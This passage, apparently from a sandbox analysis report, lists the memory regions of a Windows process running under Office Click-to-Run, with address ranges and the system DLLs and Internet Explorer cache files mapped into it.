Shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 4116 start_va = 0x7fef7c70000 end_va = 0x7fef7c72fff entry_point = 0x7fef7c70000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 4117 start_va = 0x7fef7c80000 end_va = 0x7fef7c82fff entry_point = 0x7fef7c80000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 4118 start_va = 0x7fef7c90000 end_va = 0x7fef7c92fff entry_point = 0x7fef7c90000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll") Region: id = 4119 start_va = 0x7fef7ca0000 end_va = 0x7fef7ca2fff entry_point = 0x7fef7ca0000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 4120 start_va = 0x7fef7cb0000 end_va = 0x7fef7da1fff entry_point = 0x7fef7cb0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll") Region: id = 4121 start_va = 0x7fef7db0000 end_va = 0x7fef7db3fff entry_point = 0x7fef7db0000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 4122 start_va = 0x7fef7dc0000 end_va = 0x7fef7dd6fff entry_point = 0x7fef7dc0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 4143 start_va = 0x7fef7b00000 end_va = 0x7fef7b02fff entry_point = 0x7fef7b00000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 4144 start_va = 0x7fef7b10000 end_va = 0x7fef7b12fff entry_point = 0x7fef7b10000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 4145 start_va = 0x7fef7b20000 end_va = 0x7fef7b22fff entry_point = 0x7fef7b20000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 4146 start_va = 0x7fef7b30000 end_va = 0x7fef7b32fff entry_point = 0x7fef7b30000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 4147 start_va = 0x7fef7b40000 end_va = 0x7fef7b44fff entry_point = 0x7fef7b40000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 4148 start_va = 0x7fef7b50000 end_va = 0x7fef7b54fff entry_point = 0x7fef7b50000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 4149 start_va = 0x7fef7b60000 end_va = 0x7fef7b62fff entry_point = 0x7fef7b60000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 4150 start_va = 0x7fef7b70000 end_va = 0x7fef7c0cfff entry_point = 0x7fef7b70000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 4209 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4210 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4211 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4212 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4213 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4214 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 4215 start_va = 0x4a0000 end_va = 0x627fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 4216 start_va = 0x630000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 4217 start_va = 0x7c0000 end_va = 0x87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 4218 start_va = 0x880000 end_va = 0xc72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 4219 start_va = 0xd30000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 4220 start_va = 0x7fef38b0000 end_va = 0x7fef3900fff entry_point = 0x7fef38b0000 region_type = mapped_file name = "concrt140.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\concrt140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\concrt140.dll") Region: id = 4221 start_va = 0x7fef9320000 end_va = 0x7fef933dfff entry_point = 0x7fef9320000 region_type = mapped_file name = "hlink.dll" filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll") Region: id = 4222 start_va = 0x7fefdfd0000 end_va = 0x7fefed57fff entry_point = 0x7fefdfd0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4223 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4224 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4225 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4538 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 4539 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4540 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4541 start_va = 0xd10000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 4542 start_va = 0xdb0000 end_va = 0x107efff entry_point = 0xdb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4543 start_va = 0x1080000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 4544 start_va = 0x11a0000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 4545 start_va = 0x1380000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001380000" filename = "" Region: id = 4546 start_va = 0x7fef3440000 end_va = 0x7fef3521fff entry_point = 0x7fef3440000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 4547 start_va = 0x7fef9190000 end_va = 0x7fef922ffff entry_point = 0x7fef9190000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 4548 start_va = 0x7fef9810000 end_va = 0x7fef98b6fff entry_point = 0x7fef9810000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 4549 start_va = 0x7fefc080000 end_va = 0x7fefc097fff entry_point = 0x7fefc080000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4550 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4551 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4552 start_va = 0x7fefdb30000 end_va = 0x7fefdb6cfff entry_point = 0x7fefdb30000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4553 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4554 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4555 start_va = 0x7fefa750000 end_va = 0x7fefaa65fff entry_point = 0x7fefa750000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 4568 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 4569 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 4570 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 4571 start_va = 0x350000 end_va = 0x357fff entry_point = 0x350000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4572 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 4573 start_va = 0x380000 end_va = 0x383fff entry_point = 0x380000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4574 start_va = 0x390000 end_va = 0x393fff entry_point = 0x390000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4575 start_va = 0xc80000 end_va = 0xc80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 4576 start_va = 0xc90000 end_va = 0xc90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 4577 start_va = 0xd00000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 4578 start_va = 0x14a0000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 4579 start_va = 0x1600000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 4580 start_va = 0x1720000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 4581 start_va = 0x1820000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 4582 start_va = 0x19c0000 end_va = 0x1abffff entry_point = 0x0 region_type = private name = "private_0x00000000019c0000" filename = "" Region: id = 4583 start_va = 0x1be0000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 4584 start_va = 0x1ce0000 end_va = 0x2022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ce0000" filename = "" Region: id = 4585 start_va = 0x2150000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 4586 start_va = 0x2210000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 4587 start_va = 0x23a0000 end_va = 0x23affff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 4588 start_va = 0x2430000 end_va = 0x252ffff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 4589 start_va = 0x2590000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 4590 start_va = 0x77e10000 end_va = 0x77e12fff entry_point = 0x77e10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4591 start_va = 0x7fef4d40000 end_va = 0x7fef4d5bfff entry_point = 0x7fef4d40000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4592 start_va = 0x7fef4d60000 end_va = 0x7fef4dc1fff entry_point = 0x7fef4d60000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4593 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4594 start_va = 0x7fef93b0000 end_va = 0x7fef93b8fff entry_point = 0x7fef93b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4595 start_va = 0x7fefa530000 end_va = 0x7fefa74cfff entry_point = 0x7fefa530000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4596 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4597 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4598 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4599 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4600 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4601 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4602 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4603 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4604 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4605 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4606 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4607 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4608 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4609 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4610 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4611 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4612 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4613 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4614 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4615 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4616 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4617 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4618 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4619 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4620 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 4683 start_va = 0x12a0000 end_va = 0x135ffff entry_point = 0x12a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4684 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4685 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4686 start_va = 0x7fef8ab0000 end_va = 0x7fef8ac4fff entry_point = 0x7fef8ab0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4687 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4688 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4689 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4690 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4720 start_va = 0xca0000 end_va = 0xca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 4721 start_va = 0xcb0000 end_va = 0xcb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 4722 start_va = 0x1ac0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 4723 start_va = 0x27c0000 end_va = 0x283ffff entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 4724 start_va = 0x2840000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 4725 start_va = 0x2b00000 end_va = 0x2bfffff entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 4726 start_va = 0x2cc0000 end_va = 0x2dbffff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 4727 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4728 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4729 start_va = 0x7fef8a90000 end_va = 0x7fef8aa8fff entry_point = 0x7fef8a90000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4730 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4731 start_va = 0x7fefb590000 end_va = 0x7fefb59afff entry_point = 0x7fefb590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 4732 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4733 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4734 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4735 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4736 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4737 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4738 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4739 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4740 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4807 start_va = 0xcc0000 